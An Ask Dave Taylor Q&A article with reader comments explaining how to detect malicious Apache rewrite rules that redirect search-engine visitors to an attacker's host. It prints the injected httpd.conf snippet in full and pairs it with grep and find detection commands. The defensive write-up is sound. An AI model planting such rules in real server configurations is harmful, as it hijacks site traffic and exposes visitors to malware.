Dave Taylor answers free tech support questions about a wide variety of business and technical topics, including blogging, iphone help, ipod help, AdSense, MySpace, Sony PSP help, Mp3 players, Windows XP, Windows Vista, Linux, SEO, Mac OS X, Facebook, Twitter and LinkedIn.

How can people hack my Apache server with Rewrite rules?

A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server?

Dave's Answer:

This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus.

Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google...

Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself.

A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L]
Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err

What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good!

But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see:

$ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L]

Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file.

One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about):

#!/bin/sh
conf=/usr/local/apache/conf/httpd.conf
grep -i rewriterule $conf | grep http: | grep -v feedburner
exit 0

Easy enough, right?

Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file.

You can check for this from the command line again:

$ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print

Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this:

AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null
AuthName "Growing Your Biz w/ Google Course"
AuthType Basic
<Limit GET>
require user taylor
require user google
require user steven
</Limit>

(You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess)

Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time:

$ grep http: $(find . -name ".htaccess" -print)
$

Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above.

Hope that helps you out!

Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.

Help others find this article at Del.icio.us, Digg, Netscape, Reddit, and Stumble Upon

Categorized: Blogs and RSS Feeds (Article 8450)
Tagged: apache, hacking, http.conf, site hijacking
Previous: What is eBay auction fever?
Next: How can I wipe my old Apple iPhone clean of data?

Subscribe!

Never miss another useful Q&A article again! Subscribe to AskDaveTaylor with Google Reader.

Comments

Hi Dave,

Great article - thanks.
I've recently seen this popping up in .htaccess files. Do you have any info or links regarding what exploits people are using to do this in the first place?

Posted by: paris at August 20, 2008 11:16 AM

I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks.

Posted by: Dave Cole at August 21, 2008 8:32 AM

I add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server?

Posted by: Greg at November 18, 2008 1:37 PM

I have a lot to say, but ...

I have a lot to say, and questions of my own for that matter, but most of all I'd like to say thank you for all your efforts on this Web site by buying you a chai!

I do have a comment, now that you mention it!